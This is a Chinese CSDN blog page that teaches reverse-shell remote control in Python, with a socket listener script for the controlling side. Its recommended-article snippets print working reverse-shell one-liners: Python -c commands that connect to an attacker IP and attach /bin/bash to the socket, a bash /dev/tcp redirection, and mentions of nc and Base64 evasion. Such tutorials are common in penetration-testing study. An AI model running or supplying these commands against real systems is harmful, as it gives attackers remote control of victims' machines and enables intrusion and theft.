python实战之反弹shell远程控制

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量952 收藏 5
点赞数
分类专栏: python 3入门 python 3高级
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37077262/article/details/103948961
版权
本文介绍了如何使用Python实现反弹shell的远程控制技术。通过在控制端启动服务器监听特定端口,被控制端作为客户端与其建立TCP连接。利用os和subprocess模块,可以执行系统命令,并将执行结果反馈回控制端,从而实现远程控制和目录切换的功能。
摘要由CSDN通过智能技术生成

shell就是一个命令执行环境,在windows系统下可以认为shell就是cmd

webshell就是通过浏览器输入命令,在远程电脑上执行

反弹shell就是控制者作为服务器使用,被控制者作为客户端使用

python执行系统命令,os  subprocee

os.popen(command+” 2>&1”).read()   2>&1可以把出错信息解读出来

  1. 在控制者电脑上启动服务器程序,开放一个端口监听
  2. 被控制者启动客户端程序,与服务器的开放端口建立TCP连接
  3. 控制端发送指令到客户端
  4. 客户端执行指令并把执行结果送回控制端
  5. 重复3、4可以实现无限控制

 

  远程控制

  服务器

#远程控制服务器
import socket

s=socket.socket()
s.bind(('0.0.0.0',3333))
s.listen(1)
sock,addr=s.accept()
while 1:
    command=input("指令:")
    if command=="":
        break
    sock.send(command.encode())
    result=sock.recv(65536).decode()
    print(result)
sock.close()
s.close()
最低0.47元/天 解锁文章
LKmnbZ
关注
专栏目录
反弹shell原理与实现
悦分享
08-02 3365
反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。...
[网络安全自学篇] 七十五.Vulnhub靶机渗透之bulldog信息收集和nc反弹shell(三)
杨秀璋的专栏
05-12 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了APT攻击检测溯源与常见APT组织的攻击案例,并介绍防御措施。这篇文章将讲解Vulnhub靶机渗透题目bulldog,包括信息收集及目录扫描、源码解读及系统登陆、命令注入和shell反弹、权限提升和获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
各种shell反弹方法
weixin_46626737的博客
05-16 2725
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
python反弹shell
x10n9的博客
03-09 606
python反弹shell
python反弹shell(linux)
秋水的博客
10-02 3100
第一种代码如下 标准输入 (stdin) :代码为 0 ,使用 < 或 << 标准输出 (stdout):代码为 1 ,使用 > 或 >> 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>> import socket,subprocess,os s=socket.socket(socket.AF_...
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3166
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
使用python反弹shell
noner_n的博客
05-05 2973
python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" 使用python进行反弹shell,IP改成攻击机ip,端口随意,没有
Python黑客编程——反弹shell
JOHNSON 抓什 的博客
05-20 951
看了上两边文章,你会了使用socket进行交互和subprocess执行系统命令,那么两者结合起来可以制作一个反弹shell,没有看过的去看一下把。 先说一下思路 首先hacker攻击方,编写脚本控制端(server)和受控端(client), 控制端(server)开启监听等待受害者(client)连接,连接成功后,就可以获得shell了 受控端(client)上有运行命令的函数,将接收到的数据作为命令运行,再将运行结果发送回控制端(server) 最后就是考验社会工程学的时候到了,打开监听诱使
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
最新发布
网络安全领域___专研者.
05-15 2287
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
Python3 实现一个简单的反弹shell工具
坚持硬核
01-15 618
Server.py from socket import * from time import ctime from threading import Thread from subprocess import Popen,PIPE HOST = "" PROT = 23335 BUFSIZE = 1024 ADDR = (HOST, PROT) def send(worker_socket,data): worker_socket.send(data) def worker(worke
python反弹shell_python 反弹shell,加了UDP
weixin_30953203的博客
02-20 179
用来对付一些把除了80端口都封了的变态网管用法 back.py 123.123.123.123 53 udpnc监听:nc -l 53 -u后面不加udp的话还是默认的tcp因为udp没有sequence的特性,当数据超过1个数据包的大小时会错位,具体多大会分包不太清楚,我记得是1500字节?好像和MTU有关。命令不要打太长就行了(一般情况下好像基本不会有1500个字符的命令)其实就加了4行……#...
python 反弹shell 交互
qq_32851223的博客
11-14 1140
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
[ 隧道技术 ] 反弹shell的集中常见方式(四)python反弹shell
qq_51577576的博客
09-06 1348
python反弹shell python2 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.192.1',55555));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
python shell反弹shell
WY92139010的博客
03-04 286
python shell反弹shell 正常shell需要先在攻击端开机情况下开启程序,然后攻击端运行程序,才能连接 反弹shell,攻击端是服务端,被攻击端是客户端正常shell,攻击端是客户端,被攻击端是服务端 反弹shell,先启用服务端,再启用客户端 反弹shell的好处就是:一旦被攻击端开机,立即连接上攻击端(需要攻击端一直运行) shell: 客户端:  ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值